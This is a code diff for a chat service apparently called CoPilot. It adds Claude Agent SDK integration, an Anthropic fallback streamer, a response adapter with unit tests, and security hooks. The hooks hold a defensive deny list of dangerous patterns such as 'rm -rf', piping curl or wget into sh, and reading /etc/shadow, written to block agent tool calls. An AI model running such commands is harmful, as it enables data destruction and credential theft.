assert session.messages[1].tool_calls == [_raw_tc, _raw_tc2]
def test_to_openai_messages_merges_split_assistants():
"""End-to-end: session with split assistants produces valid OpenAI messages."""
session = ChatSession.new(user_id="u")
session.messages = [
ChatMessage(role="user", content="build agent"),
ChatMessage(role="assistant", content="Let me build that"),
ChatMessage(
role="assistant",
content="",
tool_calls=[
{
"id": "tc1",
"type": "function",
"function": {"name": "create_agent", "arguments": "{}"},
}
],
),
ChatMessage(role="tool", content="done", tool_call_id="tc1"),
ChatMessage(role="assistant", content="Saved!"),
ChatMessage(role="user", content="show me an example run"),
]
openai_msgs = session.to_openai_messages()
# The two consecutive assistants at index 1,2 should be merged
roles = [m["role"] for m in openai_msgs]
assert roles == ["user", "assistant", "tool", "assistant", "user"]
# The merged assistant should have both content and tool_calls
merged = cast(ChatCompletionAssistantMessageParam, openai_msgs[1])
assert merged.get("content") == "Let me build that"
tc_list = merged.get("tool_calls")
assert tc_list is not None and len(list(tc_list)) == 1
assert list(tc_list)[0]["id"] == "tc1"

View File

@@ -1,5 +1,6 @@
"""Chat API routes for chat session management and streaming via SSE."""
import asyncio
import logging
import uuid as uuid_module
from collections.abc import AsyncGenerator
@@ -16,8 +17,16 @@ from . import service as chat_service
from . import stream_registry
from .completion_handler import process_operation_failure, process_operation_success
from .config import ChatConfig
from .model import ChatSession, create_chat_session, get_chat_session, get_user_sessions
from .response_model import StreamFinish, StreamHeartbeat
from .model import (
ChatMessage,
ChatSession,
append_and_save_message,
create_chat_session,
get_chat_session,
get_user_sessions,
)
from .response_model import StreamError, StreamFinish, StreamHeartbeat, StreamStart
from .sdk import service as sdk_service
from .tools.models import (
AgentDetailsResponse,
AgentOutputResponse,
@@ -40,6 +49,7 @@ from .tools.models import (
SetupRequirementsResponse,
UnderstandingUpdatedResponse,
)
from .tracking import track_user_message
config = ChatConfig()
@@ -231,6 +241,10 @@ async def get_session(
active_task, last_message_id = await stream_registry.get_active_task_for_session(
session_id, user_id
)
logger.info(
f"[GET_SESSION] session={session_id}, active_task={active_task is not None}, "
f"msg_count={len(messages)}, last_role={messages[-1].get('role') if messages else 'none'}"
)
if active_task:
# Filter out the in-progress assistant message from the session response.
# The client will receive the complete assistant response through the SSE
@@ -300,10 +314,9 @@ async def stream_chat_post(
f"user={user_id}, message_len={len(request.message)}",
extra={"json_fields": log_meta},
)
session = await _validate_and_get_session(session_id, user_id)
logger.info(
f"[TIMING] session validated in {(time.perf_counter() - stream_start_time)*1000:.1f}ms",
f"[TIMING] session validated in {(time.perf_counter() - stream_start_time) * 1000:.1f}ms",
extra={
"json_fields": {
**log_meta,
@@ -312,6 +325,25 @@ async def stream_chat_post(
},
)
# Atomically append user message to session BEFORE creating task to avoid
# race condition where GET_SESSION sees task as "running" but message isn't
# saved yet. append_and_save_message re-fetches inside a lock to prevent
# message loss from concurrent requests.
if request.message:
message = ChatMessage(
role="user" if request.is_user_message else "assistant",
content=request.message,
)
if request.is_user_message:
track_user_message(
user_id=user_id,
session_id=session_id,
message_length=len(request.message),
)
logger.info(f"[STREAM] Saving user message to session {session_id}")
session = await append_and_save_message(session_id, message)
logger.info(f"[STREAM] User message saved for session {session_id}")
# Create a task in the stream registry for reconnection support
task_id = str(uuid_module.uuid4())
operation_id = str(uuid_module.uuid4())
@@ -327,7 +359,7 @@ async def stream_chat_post(
operation_id=operation_id,
)
logger.info(
f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start)*1000:.1f}ms",
f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start) * 1000:.1f}ms",
extra={
"json_fields": {
**log_meta,
@@ -348,15 +380,43 @@ async def stream_chat_post(
first_chunk_time, ttfc = None, None
chunk_count = 0
try:
async for chunk in chat_service.stream_chat_completion(
# Emit a start event with task_id for reconnection
start_chunk = StreamStart(messageId=task_id, taskId=task_id)
await stream_registry.publish_chunk(task_id, start_chunk)
logger.info(
f"[TIMING] StreamStart published at {(time_module.perf_counter() - gen_start_time) * 1000:.1f}ms",
extra={
"json_fields": {
**log_meta,
"elapsed_ms": (time_module.perf_counter() - gen_start_time)
* 1000,
}
},
)
# Choose service based on configuration
use_sdk = config.use_claude_agent_sdk
stream_fn = (
sdk_service.stream_chat_completion_sdk
if use_sdk
else chat_service.stream_chat_completion
)
logger.info(
f"[TIMING] Calling {'sdk' if use_sdk else 'standard'} stream_chat_completion",
extra={"json_fields": log_meta},
)
# Pass message=None since we already added it to the session above
async for chunk in stream_fn(
session_id,
request.message,
None, # Message already in session
is_user_message=request.is_user_message,
user_id=user_id,
session=session, # Pass pre-fetched session to avoid double-fetch
session=session, # Pass session with message already added
context=request.context,
_task_id=task_id, # Pass task_id so service emits start with taskId for reconnection
):
# Skip duplicate StreamStart — we already published one above
if isinstance(chunk, StreamStart):
continue
chunk_count += 1
if first_chunk_time is None:
first_chunk_time = time_module.perf_counter()
@@ -377,7 +437,7 @@ async def stream_chat_post(
gen_end_time = time_module.perf_counter()
total_time = (gen_end_time - gen_start_time) * 1000
logger.info(
f"[TIMING] run_ai_generation FINISHED in {total_time/1000:.1f}s; "
f"[TIMING] run_ai_generation FINISHED in {total_time / 1000:.1f}s; "
f"task={task_id}, session={session_id}, "
f"ttfc={ttfc or -1:.2f}s, n_chunks={chunk_count}",
extra={
@@ -404,6 +464,17 @@ async def stream_chat_post(
}
},
)
# Publish a StreamError so the frontend can display an error message
try:
await stream_registry.publish_chunk(
task_id,
StreamError(
errorText="An error occurred. Please try again.",
code="stream_error",
),
)
except Exception:
pass # Best-effort; mark_task_completed will publish StreamFinish
await stream_registry.mark_task_completed(task_id, "failed")
# Start the AI generation in a background task
@@ -506,8 +577,14 @@ async def stream_chat_post(
"json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)}
},
)
# Surface error to frontend so it doesn't appear stuck
yield StreamError(
errorText="An error occurred. Please try again.",
code="stream_error",
).to_sse()
yield StreamFinish().to_sse()
finally:
# Unsubscribe when client disconnects or stream ends to prevent resource leak
# Unsubscribe when client disconnects or stream ends
if subscriber_queue is not None:
try:
await stream_registry.unsubscribe_from_task(
@@ -751,8 +828,6 @@ async def stream_task(
)
async def event_generator() -> AsyncGenerator[str, None]:
import asyncio
heartbeat_interval = 15.0 # Send heartbeat every 15 seconds
try:
while True:

View File

@@ -0,0 +1,14 @@
"""Claude Agent SDK integration for CoPilot.
This module provides the integration layer between the Claude Agent SDK
and the existing CoPilot tool system, enabling drop-in replacement of
the current LLM orchestration with the battle-tested Claude Agent SDK.
"""
from .service import stream_chat_completion_sdk
from .tool_adapter import create_copilot_mcp_server
__all__ = [
"stream_chat_completion_sdk",
"create_copilot_mcp_server",
]

View File

@@ -0,0 +1,363 @@
"""Anthropic SDK fallback implementation.
This module provides the fallback streaming implementation using the Anthropic SDK
directly when the Claude Agent SDK is not available.
"""
import json
import logging
import uuid
from collections.abc import AsyncGenerator
from typing import Any, cast
from ..config import ChatConfig
from ..model import ChatMessage, ChatSession
from ..response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamTextDelta,
StreamTextEnd,
StreamTextStart,
StreamToolInputAvailable,
StreamToolInputStart,
StreamToolOutputAvailable,
StreamUsage,
)
from .tool_adapter import get_tool_definitions, get_tool_handlers
logger = logging.getLogger(__name__)
config = ChatConfig()
# Maximum tool-call iterations before stopping to prevent infinite loops
_MAX_TOOL_ITERATIONS = 10
async def stream_with_anthropic(
session: ChatSession,
system_prompt: str,
text_block_id: str,
) -> AsyncGenerator[StreamBaseResponse, None]:
"""Stream using Anthropic SDK directly with tool calling support.
This function accumulates messages into the session for persistence.
The caller should NOT yield an additional StreamFinish - this function handles it.
"""
import anthropic
# Use config.api_key (CHAT_API_KEY > OPEN_ROUTER_API_KEY > OPENAI_API_KEY)
# with config.base_url for OpenRouter routing — matching the non-SDK path.
api_key = config.api_key
if not api_key:
yield StreamError(
errorText="No API key configured (set CHAT_API_KEY or OPENAI_API_KEY)",
code="config_error",
)
yield StreamFinish()
return
# Build kwargs for the Anthropic client — use base_url if configured
client_kwargs: dict[str, Any] = {"api_key": api_key}
if config.base_url:
# Strip /v1 suffix — Anthropic SDK adds its own version path
base = config.base_url.rstrip("/")
if base.endswith("/v1"):
base = base[:-3]
client_kwargs["base_url"] = base
client = anthropic.AsyncAnthropic(**client_kwargs)
tool_definitions = get_tool_definitions()
tool_handlers = get_tool_handlers()
anthropic_tools = [
{
"name": t["name"],
"description": t["description"],
"input_schema": t["inputSchema"],
}
for t in tool_definitions
]
anthropic_messages = _convert_session_to_anthropic(session)
if not anthropic_messages or anthropic_messages[-1]["role"] != "user":
anthropic_messages.append(
{"role": "user", "content": "Continue with the task."}
)
has_started_text = False
accumulated_text = ""
accumulated_tool_calls: list[dict[str, Any]] = []
for _ in range(_MAX_TOOL_ITERATIONS):
try:
async with client.messages.stream(
model=(
config.model.split("/")[-1] if "/" in config.model else config.model
),
max_tokens=4096,
system=system_prompt,
messages=cast(Any, anthropic_messages),
tools=cast(Any, anthropic_tools) if anthropic_tools else [],
) as stream:
async for event in stream:
if event.type == "content_block_start":
block = event.content_block
if hasattr(block, "type"):
if block.type == "text" and not has_started_text:
yield StreamTextStart(id=text_block_id)
has_started_text = True
elif block.type == "tool_use":
yield StreamToolInputStart(
toolCallId=block.id, toolName=block.name
)
elif event.type == "content_block_delta":
delta = event.delta
if hasattr(delta, "type") and delta.type == "text_delta":
accumulated_text += delta.text
yield StreamTextDelta(id=text_block_id, delta=delta.text)
final_message = await stream.get_final_message()
if final_message.stop_reason == "tool_use":
if has_started_text:
yield StreamTextEnd(id=text_block_id)
has_started_text = False
text_block_id = str(uuid.uuid4())
tool_results = []
assistant_content: list[dict[str, Any]] = []
for block in final_message.content:
if block.type == "text":
assistant_content.append(
{"type": "text", "text": block.text}
)
elif block.type == "tool_use":
assistant_content.append(
{
"type": "tool_use",
"id": block.id,
"name": block.name,
"input": block.input,
}
)
# Track tool call for session persistence
accumulated_tool_calls.append(
{
"id": block.id,
"type": "function",
"function": {
"name": block.name,
"arguments": json.dumps(
block.input
if isinstance(block.input, dict)
else {}
),
},
}
)
yield StreamToolInputAvailable(
toolCallId=block.id,
toolName=block.name,
input=(
block.input if isinstance(block.input, dict) else {}
),
)
output, is_error = await _execute_tool(
block.name, block.input, tool_handlers
)
yield StreamToolOutputAvailable(
toolCallId=block.id,
toolName=block.name,
output=output,
success=not is_error,
)
# Save tool result to session
session.messages.append(
ChatMessage(
role="tool",
content=output,
tool_call_id=block.id,
)
)
tool_results.append(
{
"type": "tool_result",
"tool_use_id": block.id,
"content": output,
"is_error": is_error,
}
)
# Save assistant message with tool calls to session
session.messages.append(
ChatMessage(
role="assistant",
content=accumulated_text or None,
tool_calls=(
accumulated_tool_calls
if accumulated_tool_calls
else None
),
)
)
# Reset for next iteration
accumulated_text = ""
accumulated_tool_calls = []
anthropic_messages.append(
{"role": "assistant", "content": assistant_content}
)
anthropic_messages.append({"role": "user", "content": tool_results})
continue
else:
if has_started_text:
yield StreamTextEnd(id=text_block_id)
# Save final assistant response to session
if accumulated_text:
session.messages.append(
ChatMessage(role="assistant", content=accumulated_text)
)
yield StreamUsage(
promptTokens=final_message.usage.input_tokens,
completionTokens=final_message.usage.output_tokens,
totalTokens=final_message.usage.input_tokens
+ final_message.usage.output_tokens,
)
yield StreamFinish()
return
except Exception as e:
logger.error(f"[Anthropic Fallback] Error: {e}", exc_info=True)
yield StreamError(
errorText="An error occurred. Please try again.",
code="anthropic_error",
)
yield StreamFinish()
return
yield StreamError(errorText="Max tool iterations reached", code="max_iterations")
yield StreamFinish()
def _convert_session_to_anthropic(session: ChatSession) -> list[dict[str, Any]]:
"""Convert session messages to Anthropic format.
Handles merging consecutive same-role messages (Anthropic requires alternating roles).
"""
messages: list[dict[str, Any]] = []
for msg in session.messages:
if msg.role == "user":
new_msg = {"role": "user", "content": msg.content or ""}
elif msg.role == "assistant":
content: list[dict[str, Any]] = []
if msg.content:
content.append({"type": "text", "text": msg.content})
if msg.tool_calls:
for tc in msg.tool_calls:
func = tc.get("function", {})
args = func.get("arguments", {})
if isinstance(args, str):
try:
args = json.loads(args)
except json.JSONDecodeError:
args = {}
content.append(
{
"type": "tool_use",
"id": tc.get("id", str(uuid.uuid4())),
"name": func.get("name", ""),
"input": args,
}
)
if content:
new_msg = {"role": "assistant", "content": content}
else:
continue # Skip empty assistant messages
elif msg.role == "tool":
new_msg = {
"role": "user",
"content": [
{
"type": "tool_result",
"tool_use_id": msg.tool_call_id or "",
"content": msg.content or "",
}
],
}
else:
continue
messages.append(new_msg)
# Merge consecutive same-role messages (Anthropic requires alternating roles)
return _merge_consecutive_roles(messages)
def _merge_consecutive_roles(messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
"""Merge consecutive messages with the same role.
Anthropic API requires alternating user/assistant roles.
"""
if not messages:
return []
merged: list[dict[str, Any]] = []
for msg in messages:
if merged and merged[-1]["role"] == msg["role"]:
# Merge with previous message
prev_content = merged[-1]["content"]
new_content = msg["content"]
# Normalize both to list-of-blocks form
if isinstance(prev_content, str):
prev_content = [{"type": "text", "text": prev_content}]
if isinstance(new_content, str):
new_content = [{"type": "text", "text": new_content}]
# Ensure both are lists
if not isinstance(prev_content, list):
prev_content = [prev_content]
if not isinstance(new_content, list):
new_content = [new_content]
merged[-1]["content"] = prev_content + new_content
else:
merged.append(msg)
return merged
async def _execute_tool(
tool_name: str, tool_input: Any, handlers: dict[str, Any]
) -> tuple[str, bool]:
"""Execute a tool and return (output, is_error)."""
handler = handlers.get(tool_name)
if not handler:
return f"Unknown tool: {tool_name}", True
try:
result = await handler(tool_input)
# Safely extract output - handle empty or missing content
content = result.get("content") or []
if content and isinstance(content, list) and len(content) > 0:
first_item = content[0]
output = first_item.get("text", "") if isinstance(first_item, dict) else ""
else:
output = ""
is_error = result.get("isError", False)
return output, is_error
except Exception as e:
return f"Error: {str(e)}", True

View File

@@ -0,0 +1,212 @@
"""Response adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
This module provides the adapter layer that converts streaming messages from
the Claude Agent SDK into the Vercel AI SDK UI Stream Protocol format that
the frontend expects.
"""
import json
import logging
import uuid
from claude_agent_sdk import (
AssistantMessage,
Message,
ResultMessage,
SystemMessage,
TextBlock,
ToolResultBlock,
ToolUseBlock,
UserMessage,
)
from backend.api.features.chat.response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamFinishStep,
StreamStart,
StreamStartStep,
StreamTextDelta,
StreamTextEnd,
StreamTextStart,
StreamToolInputAvailable,
StreamToolInputStart,
StreamToolOutputAvailable,
StreamUsage,
)
from backend.api.features.chat.sdk.tool_adapter import (
MCP_TOOL_PREFIX,
pop_pending_tool_output,
)
logger = logging.getLogger(__name__)
class SDKResponseAdapter:
"""Adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
This class maintains state during a streaming session to properly track
text blocks, tool calls, and message lifecycle.
"""
def __init__(self, message_id: str | None = None):
self.message_id = message_id or str(uuid.uuid4())
self.text_block_id = str(uuid.uuid4())
self.has_started_text = False
self.has_ended_text = False
self.current_tool_calls: dict[str, dict[str, str]] = {}
self.task_id: str | None = None
self.step_open = False
def set_task_id(self, task_id: str) -> None:
"""Set the task ID for reconnection support."""
self.task_id = task_id
def convert_message(self, sdk_message: Message) -> list[StreamBaseResponse]:
"""Convert a single SDK message to Vercel AI SDK format."""
responses: list[StreamBaseResponse] = []
if isinstance(sdk_message, SystemMessage):
if sdk_message.subtype == "init":
responses.append(
StreamStart(messageId=self.message_id, taskId=self.task_id)
)
# Open the first step (matches non-SDK: StreamStart then StreamStartStep)
responses.append(StreamStartStep())
self.step_open = True
elif isinstance(sdk_message, AssistantMessage):
# After tool results, the SDK sends a new AssistantMessage for the
# next LLM turn. Open a new step if the previous one was closed.
if not self.step_open:
responses.append(StreamStartStep())
self.step_open = True
for block in sdk_message.content:
if isinstance(block, TextBlock):
if block.text:
self._ensure_text_started(responses)
responses.append(
StreamTextDelta(id=self.text_block_id, delta=block.text)
)
elif isinstance(block, ToolUseBlock):
self._end_text_if_open(responses)
# Strip MCP prefix so frontend sees "find_block"
# instead of "mcp__copilot__find_block".
tool_name = block.name.removeprefix(MCP_TOOL_PREFIX)
responses.append(
StreamToolInputStart(toolCallId=block.id, toolName=tool_name)
)
responses.append(
StreamToolInputAvailable(
toolCallId=block.id,
toolName=tool_name,
input=block.input,
)
)
self.current_tool_calls[block.id] = {"name": tool_name}
elif isinstance(sdk_message, UserMessage):
# UserMessage carries tool results back from tool execution.
content = sdk_message.content
blocks = content if isinstance(content, list) else []
for block in blocks:
if isinstance(block, ToolResultBlock) and block.tool_use_id:
tool_info = self.current_tool_calls.get(block.tool_use_id, {})
tool_name = tool_info.get("name", "unknown")
# Prefer the stashed full output over the SDK's
# (potentially truncated) ToolResultBlock content.
# The SDK truncates large results, writing them to disk,
# which breaks frontend widget parsing.
output = pop_pending_tool_output(tool_name) or (
_extract_tool_output(block.content)
)
responses.append(
StreamToolOutputAvailable(
toolCallId=block.tool_use_id,
toolName=tool_name,
output=output,
success=not (block.is_error or False),
)
)
# Close the current step after tool results — the next
# AssistantMessage will open a new step for the continuation.
if self.step_open:
responses.append(StreamFinishStep())
self.step_open = False
elif isinstance(sdk_message, ResultMessage):
self._end_text_if_open(responses)
# Close the step before finishing.
if self.step_open:
responses.append(StreamFinishStep())
self.step_open = False
# Emit token usage if the SDK reported it
usage = getattr(sdk_message, "usage", None) or {}
if usage:
input_tokens = usage.get("input_tokens", 0)
output_tokens = usage.get("output_tokens", 0)
responses.append(
StreamUsage(
promptTokens=input_tokens,
completionTokens=output_tokens,
totalTokens=input_tokens + output_tokens,
)
)
if sdk_message.subtype == "success":
responses.append(StreamFinish())
elif sdk_message.subtype in ("error", "error_during_execution"):
error_msg = getattr(sdk_message, "result", None) or "Unknown error"
responses.append(
StreamError(errorText=str(error_msg), code="sdk_error")
)
responses.append(StreamFinish())
else:
logger.debug(f"Unhandled SDK message type: {type(sdk_message).__name__}")
return responses
def _ensure_text_started(self, responses: list[StreamBaseResponse]) -> None:
"""Start (or restart) a text block if needed."""
if not self.has_started_text or self.has_ended_text:
if self.has_ended_text:
self.text_block_id = str(uuid.uuid4())
self.has_ended_text = False
responses.append(StreamTextStart(id=self.text_block_id))
self.has_started_text = True
def _end_text_if_open(self, responses: list[StreamBaseResponse]) -> None:
"""End the current text block if one is open."""
if self.has_started_text and not self.has_ended_text:
responses.append(StreamTextEnd(id=self.text_block_id))
self.has_ended_text = True
def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
"""Extract a string output from a ToolResultBlock's content field."""
if isinstance(content, str):
return content
if isinstance(content, list):
parts = [item.get("text", "") for item in content if item.get("type") == "text"]
if parts:
return "".join(parts)
try:
return json.dumps(content)
except (TypeError, ValueError):
return str(content)
if content is None:
return ""
try:
return json.dumps(content)
except (TypeError, ValueError):
return str(content)

View File

@@ -0,0 +1,366 @@
"""Unit tests for the SDK response adapter."""
from claude_agent_sdk import (
AssistantMessage,
ResultMessage,
SystemMessage,
TextBlock,
ToolResultBlock,
ToolUseBlock,
UserMessage,
)
from backend.api.features.chat.response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamFinishStep,
StreamStart,
StreamStartStep,
StreamTextDelta,
StreamTextEnd,
StreamTextStart,
StreamToolInputAvailable,
StreamToolInputStart,
StreamToolOutputAvailable,
)
from .response_adapter import SDKResponseAdapter
from .tool_adapter import MCP_TOOL_PREFIX
def _adapter() -> SDKResponseAdapter:
a = SDKResponseAdapter(message_id="msg-1")
a.set_task_id("task-1")
return a
# -- SystemMessage -----------------------------------------------------------
def test_system_init_emits_start_and_step():
adapter = _adapter()
results = adapter.convert_message(SystemMessage(subtype="init", data={}))
assert len(results) == 2
assert isinstance(results[0], StreamStart)
assert results[0].messageId == "msg-1"
assert results[0].taskId == "task-1"
assert isinstance(results[1], StreamStartStep)
def test_system_non_init_emits_nothing():
adapter = _adapter()
results = adapter.convert_message(SystemMessage(subtype="other", data={}))
assert results == []
# -- AssistantMessage with TextBlock -----------------------------------------
def test_text_block_emits_step_start_and_delta():
adapter = _adapter()
msg = AssistantMessage(content=[TextBlock(text="hello")], model="test")
results = adapter.convert_message(msg)
assert len(results) == 3
assert isinstance(results[0], StreamStartStep)
assert isinstance(results[1], StreamTextStart)
assert isinstance(results[2], StreamTextDelta)
assert results[2].delta == "hello"
def test_empty_text_block_emits_only_step():
adapter = _adapter()
msg = AssistantMessage(content=[TextBlock(text="")], model="test")
results = adapter.convert_message(msg)
# Empty text skipped, but step still opens
assert len(results) == 1
assert isinstance(results[0], StreamStartStep)
def test_multiple_text_deltas_reuse_block_id():
adapter = _adapter()
msg1 = AssistantMessage(content=[TextBlock(text="a")], model="test")
msg2 = AssistantMessage(content=[TextBlock(text="b")], model="test")
r1 = adapter.convert_message(msg1)
r2 = adapter.convert_message(msg2)
# First gets step+start+delta, second only delta (block & step already started)
assert len(r1) == 3
assert isinstance(r1[0], StreamStartStep)
assert isinstance(r1[1], StreamTextStart)
assert len(r2) == 1
assert isinstance(r2[0], StreamTextDelta)
assert r1[1].id == r2[0].id # same block ID
# -- AssistantMessage with ToolUseBlock --------------------------------------
def test_tool_use_emits_input_start_and_available():
"""Tool names arrive with MCP prefix and should be stripped for the frontend."""
adapter = _adapter()
msg = AssistantMessage(
content=[
ToolUseBlock(
id="tool-1",
name=f"{MCP_TOOL_PREFIX}find_agent",
input={"q": "x"},
)
],
model="test",
)
results = adapter.convert_message(msg)
assert len(results) == 3
assert isinstance(results[0], StreamStartStep)
assert isinstance(results[1], StreamToolInputStart)
assert results[1].toolCallId == "tool-1"
assert results[1].toolName == "find_agent" # prefix stripped
assert isinstance(results[2], StreamToolInputAvailable)
assert results[2].toolName == "find_agent" # prefix stripped
assert results[2].input == {"q": "x"}
def test_text_then_tool_ends_text_block():
adapter = _adapter()
text_msg = AssistantMessage(content=[TextBlock(text="thinking...")], model="test")
tool_msg = AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
model="test",
)
adapter.convert_message(text_msg) # opens step + text
results = adapter.convert_message(tool_msg)
# Step already open, so: TextEnd, ToolInputStart, ToolInputAvailable
assert len(results) == 3
assert isinstance(results[0], StreamTextEnd)
assert isinstance(results[1], StreamToolInputStart)
# -- UserMessage with ToolResultBlock ----------------------------------------
def test_tool_result_emits_output_and_finish_step():
adapter = _adapter()
# First register the tool call (opens step) — SDK sends prefixed name
tool_msg = AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}find_agent", input={})],
model="test",
)
adapter.convert_message(tool_msg)
# Now send tool result
result_msg = UserMessage(
content=[ToolResultBlock(tool_use_id="t1", content="found 3 agents")]
)
results = adapter.convert_message(result_msg)
assert len(results) == 2
assert isinstance(results[0], StreamToolOutputAvailable)
assert results[0].toolCallId == "t1"
assert results[0].toolName == "find_agent" # prefix stripped
assert results[0].output == "found 3 agents"
assert results[0].success is True
assert isinstance(results[1], StreamFinishStep)
def test_tool_result_error():
adapter = _adapter()
adapter.convert_message(
AssistantMessage(
content=[
ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}run_agent", input={})
],
model="test",
)
)
result_msg = UserMessage(
content=[ToolResultBlock(tool_use_id="t1", content="timeout", is_error=True)]
)
results = adapter.convert_message(result_msg)
assert isinstance(results[0], StreamToolOutputAvailable)
assert results[0].success is False
assert isinstance(results[1], StreamFinishStep)
def test_tool_result_list_content():
adapter = _adapter()
adapter.convert_message(
AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
model="test",
)
)
result_msg = UserMessage(
content=[
ToolResultBlock(
tool_use_id="t1",
content=[
{"type": "text", "text": "line1"},
{"type": "text", "text": "line2"},
],
)
]
)
results = adapter.convert_message(result_msg)
assert isinstance(results[0], StreamToolOutputAvailable)
assert results[0].output == "line1line2"
assert isinstance(results[1], StreamFinishStep)
def test_string_user_message_ignored():
"""A plain string UserMessage (not tool results) produces no output."""
adapter = _adapter()
results = adapter.convert_message(UserMessage(content="hello"))
assert results == []
# -- ResultMessage -----------------------------------------------------------
def test_result_success_emits_finish_step_and_finish():
adapter = _adapter()
# Start some text first (opens step)
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="done")], model="test")
)
msg = ResultMessage(
subtype="success",
duration_ms=100,
duration_api_ms=50,
is_error=False,
num_turns=1,
session_id="s1",
)
results = adapter.convert_message(msg)
# TextEnd + FinishStep + StreamFinish
assert len(results) == 3
assert isinstance(results[0], StreamTextEnd)
assert isinstance(results[1], StreamFinishStep)
assert isinstance(results[2], StreamFinish)
def test_result_error_emits_error_and_finish():
adapter = _adapter()
msg = ResultMessage(
subtype="error",
duration_ms=100,
duration_api_ms=50,
is_error=True,
num_turns=0,
session_id="s1",
result="API rate limited",
)
results = adapter.convert_message(msg)
# No step was open, so no FinishStep — just Error + Finish
assert len(results) == 2
assert isinstance(results[0], StreamError)
assert "API rate limited" in results[0].errorText
assert isinstance(results[1], StreamFinish)
# -- Text after tools (new block ID) ----------------------------------------
def test_text_after_tool_gets_new_block_id():
adapter = _adapter()
# Text -> Tool -> ToolResult -> Text should get a new text block ID and step
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="before")], model="test")
)
adapter.convert_message(
AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
model="test",
)
)
# Send tool result (closes step)
adapter.convert_message(
UserMessage(content=[ToolResultBlock(tool_use_id="t1", content="ok")])
)
results = adapter.convert_message(
AssistantMessage(content=[TextBlock(text="after")], model="test")
)
# Should get StreamStartStep (new step) + StreamTextStart (new block) + StreamTextDelta
assert len(results) == 3
assert isinstance(results[0], StreamStartStep)
assert isinstance(results[1], StreamTextStart)
assert isinstance(results[2], StreamTextDelta)
assert results[2].delta == "after"
# -- Full conversation flow --------------------------------------------------
def test_full_conversation_flow():
"""Simulate a complete conversation: init -> text -> tool -> result -> text -> finish."""
adapter = _adapter()
all_responses: list[StreamBaseResponse] = []
# 1. Init
all_responses.extend(
adapter.convert_message(SystemMessage(subtype="init", data={}))
)
# 2. Assistant text
all_responses.extend(
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="Let me search")], model="test")
)
)
# 3. Tool use
all_responses.extend(
adapter.convert_message(
AssistantMessage(
content=[
ToolUseBlock(
id="t1",
name=f"{MCP_TOOL_PREFIX}find_agent",
input={"query": "email"},
)
],
model="test",
)
)
)
# 4. Tool result
all_responses.extend(
adapter.convert_message(
UserMessage(
content=[ToolResultBlock(tool_use_id="t1", content="Found 2 agents")]
)
)
)
# 5. More text
all_responses.extend(
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="I found 2")], model="test")
)
)
# 6. Result
all_responses.extend(
adapter.convert_message(
ResultMessage(
subtype="success",
duration_ms=500,
duration_api_ms=400,
is_error=False,
num_turns=2,
session_id="s1",
)
)
)
types = [type(r).__name__ for r in all_responses]
assert types == [
"StreamStart",
"StreamStartStep", # step 1: text + tool call
"StreamTextStart",
"StreamTextDelta", # "Let me search"
"StreamTextEnd", # closed before tool
"StreamToolInputStart",
"StreamToolInputAvailable",
"StreamToolOutputAvailable", # tool result
"StreamFinishStep", # step 1 closed after tool result
"StreamStartStep", # step 2: continuation text
"StreamTextStart", # new block after tool
"StreamTextDelta", # "I found 2"
"StreamTextEnd", # closed by result
"StreamFinishStep", # step 2 closed
"StreamFinish",
]

View File

@@ -0,0 +1,393 @@
"""Security hooks for Claude Agent SDK integration.
This module provides security hooks that validate tool calls before execution,
ensuring multi-user isolation and preventing unauthorized operations.
"""
import json
import logging
import os
import re
import shlex
from typing import Any, cast
from backend.api.features.chat.sdk.tool_adapter import MCP_TOOL_PREFIX
logger = logging.getLogger(__name__)
# Tools that are blocked entirely (CLI/system access)
BLOCKED_TOOLS = {
"bash",
"shell",
"exec",
"terminal",
"command",
}
# Safe read-only commands allowed in the sandboxed Bash tool.
# These are data-processing / inspection utilities — no writes, no network.
ALLOWED_BASH_COMMANDS = {
# JSON / structured data
"jq",
# Text processing
"grep",
"egrep",
"fgrep",
"rg",
"head",
"tail",
"cat",
"wc",
"sort",
"uniq",
"cut",
"tr",
"sed",
"awk",
"column",
"fold",
"fmt",
"nl",
"paste",
"rev",
# File inspection (read-only)
"find",
"ls",
"file",
"stat",
"du",
"tree",
"basename",
"dirname",
"realpath",
# Utilities
"echo",
"printf",
"date",
"true",
"false",
"xargs",
"tee",
# Comparison / encoding
"diff",
"comm",
"base64",
"md5sum",
"sha256sum",
}
# Tools allowed only when their path argument stays within the SDK workspace.
# The SDK uses these to handle oversized tool results (writes to tool-results/
# files, then reads them back) and for workspace file operations.
WORKSPACE_SCOPED_TOOLS = {"Read", "Write", "Edit", "Glob", "Grep"}
# Tools that get sandboxed Bash validation (command allowlist + workspace paths).
SANDBOXED_BASH_TOOLS = {"Bash"}
# Dangerous patterns in tool inputs
DANGEROUS_PATTERNS = [
r"sudo",
r"rm\s+-rf",
r"dd\s+if=",
r"/etc/passwd",
r"/etc/shadow",
r"chmod\s+777",
r"curl\s+.*\|.*sh",
r"wget\s+.*\|.*sh",
r"eval\s*\(",
r"exec\s*\(",
r"__import__",
r"os\.system",
r"subprocess",
]
def _deny(reason: str) -> dict[str, Any]:
"""Return a hook denial response."""
return {
"hookSpecificOutput": {
"hookEventName": "PreToolUse",
"permissionDecision": "deny",
"permissionDecisionReason": reason,
}
}
def _validate_workspace_path(
tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None
) -> dict[str, Any]:
"""Validate that a workspace-scoped tool only accesses allowed paths.
Allowed directories:
- The SDK working directory (``/tmp/copilot-<session>/``)
